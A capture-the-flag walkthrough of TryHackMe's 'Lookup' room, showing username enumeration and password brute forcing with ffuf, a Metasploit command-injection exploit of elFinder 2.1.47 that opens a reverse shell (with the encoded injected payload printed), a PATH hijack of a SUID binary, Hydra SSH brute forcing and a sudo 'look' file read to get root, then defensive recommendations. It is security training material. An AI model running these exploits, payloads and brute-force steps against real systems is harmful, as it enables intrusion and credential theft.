Lookup

A detailed walkthrough of exploiting a vulnerable elFinder installation to gain initial access, followed by privilege escalation through password discovery and SUID binary exploitation.

Web Exploitation
Privilege Escalation
Credential Harvesting
Linux Security
Challenge Overview

This walkthrough documents a penetration test of the "Lookup" challenge on TryHackMe. The assessment demonstrates a methodical approach to compromising a target system through web application vulnerabilities, credential brute forcing, and Linux privilege escalation techniques.

The target system hosts a vulnerable file manager application that can be exploited to gain initial access, followed by lateral movement to a user account and ultimately privilege escalation to root.

1. Initial Reconnaissance

Nmap Scan
Port scanning and service enumeration

We begin our reconnaissance with a comprehensive Nmap scan to identify open ports and services:

$ nmap -sS -Pn -p- -v -A 10.10.52.214

 

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

|_http-title: Did not follow redirect to http://lookup.thm/

Open Ports

  • 22/TCP
    SSH (OpenSSH 8.2p1)
  • 80/TCP
    HTTP (Apache 2.4.41)

Web Application

  • Domain:lookup.thm
  • Pages:index.php, login.php
  • Subdomain:files.lookup.thm (discovered later)

After adding the domain to our /etc/hosts file, we explore the web application and discover:

  • A login page at login.php
  • The login form is vulnerable to username enumeration based on different error messages
  • "Wrong password" vs "Wrong username or password" responses can be used to identify valid users

2. Credential Brute Forcing

Username & Password Discovery
Exploiting authentication vulnerabilities

Username Enumeration

Using ffuf to enumerate valid usernames by looking for the "Wrong password" response:

$ ffuf -request req -request-proto http -w /usr/share/seclists/Usernames/Names/names.txt -mr "Wrong password"

Valid usernames discovered:

admin
jose

Password Brute Forcing

Using ffuf to brute force passwords for the discovered usernames:

$ ffuf -request req -request-proto http -w usernames:FUZZ1 -w /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt:FUZZ2 -replay-proxy http://127.0.0.1:8080 -mc 302

Discovered Credentials:

password123

After successful login, we discover a subdomain: files.lookup.thm

3. Secondary Reconnaissance

elFinder Discovery
Exploring the file manager application

File Manager Interface

We discover an elFinder file manager at files.lookup.thm/elFinder/elfinder.html:

elFinder file manager interface
elFinder file manager showing various text files

The file manager reveals several directories:

  • /files
  • /img
  • /php
  • /sounds
  • /js
  • /css

Version Information

We discover version information for elFinder:

elFinder version information
elFinder version 2.1.47 information

Version Details:

  • Version: 2.1.47
  • Protocol version: 2.1047
  • jQuery/jQuery UI: 3.3.1/1.12.1

Vulnerability Research

A search for exploits reveals that this version of elFinder is vulnerable:

Metasploit search results
Metasploit search results showing elFinder exploits

Available Exploits:

  • exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection - PHP Connector exiftran Command Injection
  • exploit/linux/http/elfinder_archive_cmd_injection - Archive Command Injection

4. Initial Access

Exploitation
Leveraging the elFinder vulnerability

Using Metasploit, we exploit the vulnerable elFinder installation to gain a meterpreter session:

Metasploit exploitation
Successful exploitation of elFinder vulnerability

msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run

[+] Started reverse TCP handler on 10.10.39.163:4444

[+] Uploading payload 'hT55418.jpg;echo 637020e2e2f6696c65732f85435354693982e6a7072a6563686f2a202e2e2 |xxd -r -p |sh #.jpg'

[+] Executing vulnerability via image rotation ...

[+] Sending stage (39927 bytes) to 10.10.52.214

[+] Deleted .8XxbAhTF.php

[+] Meterpreter session 1 opened (10.10.39.163:4444 → 10.10.52.214:58108)

Host Enumeration

With our initial foothold, we enumerate the system to find potential privilege escalation vectors:

User Discovery

We discover a user named think through /etc/passwd:

User enumeration
Output of cat /etc/passwd showing the think user

SUID Binary Discovery

We find a SUID binary with unusual permissions:

$ find / -perm /4000 2>/dev/null

/usr/bin/sudo

/usr/bin/pkexec

/usr/bin/chfn

/usr/bin/newgrp

/usr/bin/gpasswd

/usr/bin/umount

/usr/bin/passwd

/usr/bin/mount

/usr/bin/su

/usr/bin/chsh

/usr/sbin/pwm

SUID Binary Analysis:

The /usr/sbin/pwm binary attempts to read a hidden .passwords file within the executing user's home directory.

Path Hijacking

We can exploit the SUID binary by creating a fake id binary and modifying our PATH:

$ cat > /tmp/id << EOF

#!/bin/bash

echo "uid=33(think) gid=33(think) groups=33(think)"

EOF

$ chmod +x /tmp/id

$ export PATH=/tmp:$PATH

$ /usr/sbin/pwm

This reveals a list of potential passwords for the think user, including josemario.AKA(think).

5. User Access

SSH Access
Gaining user-level access

Using the password list obtained earlier, we brute force SSH access to the think user:

Hydra brute force
Successful password discovery with Hydra

$ hydra -l think -P passwords ssh://10.10.59.34

Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-04 19:04:30

[DATA] max 16 tasks per 1 server, overall 16 tasks, 49 login tries (l:1/p:49), ~4 tries per

[DATA] attacking ssh://10.10.59.34:22/

[22][ssh] host: 10.10.59.34 login: think password: josemario.AKA(think)

1 of 1 target successfully completed, 1 valid password found

SSH Credentials:

think:josemario.AKA(think)

After logging in as think, we capture the user flag:

think@lookup:~$ cat user.txt

38375fb4dd8baa2b2039ac03d92b820e

6. Privilege Escalation

Root Access
Exploiting sudo privileges

We check for sudo privileges:

Sudo privileges
Sudo -l output showing the think user can run the look binary

think@lookup:~$ sudo -l

[sudo] password for think:

Matching Defaults entries for think on lookup:

    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

 

User think may run the following commands on lookup:

    (ALL) /usr/bin/look

The think user can run the look binary with sudo privileges. According to GTFOBins, this can be exploited to read arbitrary files:

GTFOBins Exploit:

From GTFOBins, we can use the following technique:

LFILE=file_to_read

sudo look '' "$LFILE"

Using this technique, we capture the root flag:

think@lookup:~$ sudo look '' /root/root.txt

5a285a9f257e45c68bb6c9f9f57d18e8

Key Findings & Recommendations

Key Findings & Recommendations

Critical Vulnerabilities

  • Outdated Web Application

    elFinder version 2.1.47 is vulnerable to command injection.

  • Weak Authentication

    Login form vulnerable to username enumeration and brute force attacks.

  • Insecure SUID Binary

    Custom SUID binary vulnerable to PATH hijacking.

  • Excessive Sudo Privileges

    User allowed to run the look binary with sudo, enabling file read access.

Security Recommendations

  • Update Web Applications

    Keep all web applications updated to the latest secure versions.

  • Implement Secure Authentication

    Use consistent error messages and implement rate limiting for login attempts.

  • Review SUID Binaries

    Regularly audit SUID binaries and remove unnecessary privileges.

  • Restrict Sudo Access

    Follow the principle of least privilege when configuring sudo permissions.

Based on TryHackMe's "Lookup" room

View Original Challenge